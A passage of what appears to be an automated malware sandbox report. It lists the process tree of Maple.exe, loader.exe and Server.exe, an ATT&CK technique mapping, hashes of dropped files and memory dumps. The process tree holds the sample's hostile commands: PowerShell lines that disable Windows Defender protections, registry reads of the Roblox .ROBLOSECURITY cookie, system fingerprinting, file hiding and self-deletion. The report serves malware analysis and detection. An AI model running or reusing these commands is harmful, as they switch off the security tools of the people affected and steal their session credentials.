        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        64⤵
        Drops file in Drivers directory
        
        PID:2204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        65⤵
        
        PID:1812
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        65⤵
        Views/modifies file attributes
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        65⤵
        
        PID:1276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        65⤵
        
        PID:2020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        65⤵
        
        PID:2424
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        65⤵
        
        PID:2760
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        65⤵
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        65⤵
        Detects videocard installed
        
        PID:1276
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        65⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2152
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        64⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        65⤵
        System Location Discovery: System Language Discovery
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        65⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        65⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        66⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        66⤵
        
        PID:264
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        66⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        67⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        67⤵
        Drops file in Drivers directory
        
        PID:108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        68⤵
        
        PID:2300
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        68⤵
        Views/modifies file attributes
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        68⤵
        
        PID:1016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        68⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        68⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        68⤵
        
        PID:2704
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        68⤵
        
        PID:484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        68⤵
        
        PID:1588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        68⤵
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        68⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        68⤵
        Detects videocard installed
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        68⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2412
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        69⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        67⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        68⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        68⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        68⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        69⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        69⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        70⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        70⤵
        
        PID:1936

C:\Windows\system32\taskeng.exe
taskeng.exe {295E8AE2-40DC-4D56-9F59-E2436D6236A6} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
1⤵
PID:1072
- C:\Users\Admin\AppData\Roaming\Ondrive.exe
  C:\Users\Admin\AppData\Roaming\Ondrive.exe
  2⤵
  - Executes dropped EXE
  PID:1796
- C:\Users\Admin\AppData\Roaming\Ondrive.exe
  C:\Users\Admin\AppData\Roaming\Ondrive.exe
  2⤵
  PID:1712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Maple.exe

Filesize
227KB

MD5
550b445ad1a44d1f23f7155fae400db6

SHA1
cb006a53156285fdef3a0b33a4a08f534cd3bab7

SHA256
d223b3918e8bc3bab1d23fdc2e306be1c6587d3ab8f324fc377e37585387884e

SHA512
909f31f24672ffc5542ac42f344eb6020bcdfdfac9ac13d5672fe7ed22e686b06385d15709f1f83b576b1dade591ad40eb429ef076d07f4597235cd95a679fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RQVgFKAP4Eux59U

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\j28qnNpM7QKy6V5

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\y9cCaCsETfr4TvU\Display\Display.png

Filesize
387KB

MD5
d341204276dc014951aea904e0bb5d0b

SHA1
638eb28d177e75c93cfb8b15d2e12ce312b55f25

SHA256
62c90e85be6cf4835de4c712fa51d088dd627129b09b726a5ab17964414fc1f5

SHA512
eac7c8c10cff5329798f39858ed878a000de729843aa9932cb9e5bc3af6f4109be9380a552ebfcb0e20b0bbed33c2c67fbe49ec51c494516d9a9966fe2a2ef69

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8bddfdf81db3d6a5a3121b716a4e4b31

SHA1
e48a5629bd900db1bdb3c0f2acbc77ea634f1008

SHA256
f0ec58f05c24c25ba51e317699df1292920f9a3e89e135e287c1e3962ae0a997

SHA512
cd6b4e5ead95b81bf58327dc996db7514dd29569e632e6de890e23fdd6412e97a194ffb035c09190781ba0451c6022d598040dddcf4c00677b7bb33d1c6c708b

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
5.4MB

MD5
916f7dea6831485387d70b0891455e65

SHA1
176e995cc2584d7c9703b2beee0994dcc4be91d5

SHA256
c47e49026afb1d2c8708f1e36510ad862eb288c7ac48e9c4bebfbd051475fbc2

SHA512
ba5c40e6416a53c88f5b5d7e0ce346956ef6bd0aebed355df8070ebb71dda78125945fe1cdca87caa29a2b5d98c437bafd228396a516c91f764256e54556f0e4

Download Submit
memory/272-700-0x0000000000900000-0x0000000000940000-memory.dmp

Filesize
256KB

Download
memory/572-178-0x0000000002760000-0x0000000002768000-memory.dmp

Filesize
32KB

Download
memory/792-30-0x0000000000D50000-0x0000000000D68000-memory.dmp

Filesize
96KB

Download
memory/888-94-0x00000000011D0000-0x00000000011E8000-memory.dmp

Filesize
96KB

Download
memory/1248-561-0x0000000001270000-0x00000000012B0000-memory.dmp

Filesize
256KB

Download
memory/1480-93-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1604-161-0x00000000013A0000-0x00000000013E0000-memory.dmp

Filesize
256KB

Download
memory/1712-630-0x00000000009A0000-0x00000000009B0000-memory.dmp

Filesize
64KB

Download
memory/1716-283-0x0000000000B60000-0x0000000000BA0000-memory.dmp

Filesize
256KB

Download
memory/1740-40-0x00000000000F0000-0x0000000000130000-memory.dmp

Filesize
256KB

Download
memory/1796-320-0x0000000000920000-0x0000000000930000-memory.dmp

Filesize
64KB

Download
memory/1940-172-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/2060-215-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2068-51-0x0000000000D50000-0x0000000000D60000-memory.dmp

Filesize
64KB

Download
memory/2208-389-0x00000000010E0000-0x0000000001120000-memory.dmp

Filesize
256KB

Download
memory/2292-68-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2292-67-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2320-458-0x00000000003B0000-0x00000000003F0000-memory.dmp

Filesize
256KB

Download
memory/2400-318-0x0000000000E80000-0x0000000000EC0000-memory.dmp

Filesize
256KB

Download
memory/2416-665-0x0000000000340000-0x0000000000380000-memory.dmp

Filesize
256KB

Download
memory/2480-248-0x00000000001A0000-0x00000000001E0000-memory.dmp

Filesize
256KB

Download
memory/2560-210-0x0000000000010000-0x0000000000050000-memory.dmp

Filesize
256KB

Download
memory/2580-52-0x000007FEF5FF0000-0x000007FEF69DC000-memory.dmp

Filesize
9.9MB

Download
memory/2580-35-0x000007FEF5FF0000-0x000007FEF69DC000-memory.dmp

Filesize
9.9MB

Download
memory/2580-24-0x0000000000850000-0x0000000000DB0000-memory.dmp

Filesize
5.4MB

Download
memory/2580-23-0x000007FEF5FF3000-0x000007FEF5FF4000-memory.dmp

Filesize
4KB

Download
memory/2632-75-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2632-74-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2800-59-0x0000000000E20000-0x0000000000E38000-memory.dmp

Filesize
96KB

Download
memory/2800-735-0x0000000000E40000-0x0000000000E80000-memory.dmp

Filesize
256KB

Download
memory/2896-221-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2896-220-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2988-144-0x0000000000E90000-0x0000000000EA8000-memory.dmp

Filesize
96KB

Download